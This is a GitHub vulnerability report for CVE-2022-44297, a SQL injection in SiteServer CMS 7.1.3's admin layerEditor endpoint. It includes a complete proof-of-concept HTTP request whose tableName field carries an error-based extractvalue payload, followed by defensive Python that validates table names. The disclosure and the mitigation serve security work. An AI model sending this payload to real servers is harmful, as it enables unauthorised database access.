CVE-2022-44297: background sql inject · Issue #3490 · siteserver/cms

SiteServer CMS 7.1.3 has a SQL injection vulnerability in the background.


Environment information: sscms 7.1.3 + mysql (background administrator)

Vulnerability details

api/admin/common/tableStyle/layerEditor

step1

\SSCMS.Web\Controllers\Admin\Common\TableStyle\LayerEditorController.Submit.cs#update function

step2

After entering the InsertObjectAsync method of \cms-sscms-v7.1.3\src\Datory\Utils\RepositoryUtils.Insert.cs

The table is passed directly into the SQL statement without filtering.
Finally, the result is returned without any filtering or other operations on the SQL statement, resulting in a SQL injection vulnerability.

Vulnerability to reproduce

exploit result
```
POST /api/admin/common/tableStyle/layerEditor HTTP/1.1
Host: 192.168.3.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 338
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.9
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1laWQiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6IkFkbWluaXN0cmF0b3IiLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL2lzcGVyc2lzdGVudCI6IkZhbHNlIiwibmJmIjoxNjY2MTY2NTA0LCJleHAiOjE2NjYyNTI5MDQsImlhdCI6MTY2NjE2NjUwNH0.ZyaN5rNgUQxxkfxp3-GEV_e3RdiKPG4BjVFKBPZkdTU
Content-Type: application/json;charset=UTF-8
Cookie: .AspNetCore.Antiforgery.63-E5AgGJCk=CfDJ8M6RIMVIA85OqO7ajAvAmn0W_d4giFi-UZleDB9SmjuNjqZshLg6aw57gScnZlpH6U67ohL01F-C9bjGigmapHHvA5s3qiVH_pJSxx6-DoVIkm0H9mRiZ7vnlUqgrXXLDHrtcZvMrPva6Cv41qAIV-I
Origin: http://192.168.3.129
Referer: http://192.168.3.129/ss-admin/common/tableStyleLayerEditor/?siteId=1&tableName=siteserver_Site&relatedIdentities=1%2C0&attributeName=weichat
Accept-Encoding: gzip

{"attributeName":"weichat","customizeCode":null,"defaultValue":"1","displayName":"111","height":0,"helpText":"11","horizontal":false,"inputType":"Image","isRapid":true,"items":null,"rapidValues":"","relatedFieldId":null,"relatedIdentities":"1,0","tableName":"siteserver_Site’and/**/extractvalue(1,concat(char(126),user()))and’","taxis":1}
```
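The report traces the flaw to the `tableName` field reaching the SQL text unfiltered. Table names cannot be bound as query parameters, so the usual defence is to validate them before they are interpolated. The following is an added example, not code from the report or from SSCMS: the function names, the allowlist contents and the sample bodies are assumptions constructed for illustration.

```python
import json
import re

# MySQL-style plain identifier: letters, digits, underscore, at most 64 chars.
IDENTIFIER = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")

# Constructed allowlist; a real deployment would load it from the schema.
KNOWN_TABLES = {"siteserver_Site", "example_Table"}


def check_table_name(name):
    """Return None when the name is safe to use, otherwise the reason it is not."""
    if not isinstance(name, str):
        return "not a string"
    if not IDENTIFIER.fullmatch(name):
        return "not a plain identifier"
    if name not in KNOWN_TABLES:
        return "unknown table"
    return None


def quote_identifier(name):
    """Validate first, then backtick-quote the name for use in MySQL statement text."""
    reason = check_table_name(name)
    if reason is not None:
        raise ValueError(f"refusing table name: {reason}")
    return "`" + name + "`"


def review_body(raw_body):
    """Check the JSON body of a layerEditor request; return a list of findings."""
    try:
        body = json.loads(raw_body)
    except json.JSONDecodeError:
        return ["body is not valid JSON"]
    if not isinstance(body, dict):
        return ["body is not a JSON object"]
    reason = check_table_name(body.get("tableName"))
    return [] if reason is None else [f"tableName rejected: {reason}"]


# Constructed sample bodies (not captured traffic).
GOOD_BODY = json.dumps({"attributeName": "weichat", "tableName": "siteserver_Site"})
BAD_BODY = json.dumps({"attributeName": "weichat", "tableName": "siteserver_Site'and/**/1=1"})

if __name__ == "__main__":
    for sample in (GOOD_BODY, BAD_BODY):
        print(review_body(sample) or "ok")
```

The same check works server-side before the statement is built and as a review rule over logged request bodies for this endpoint.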
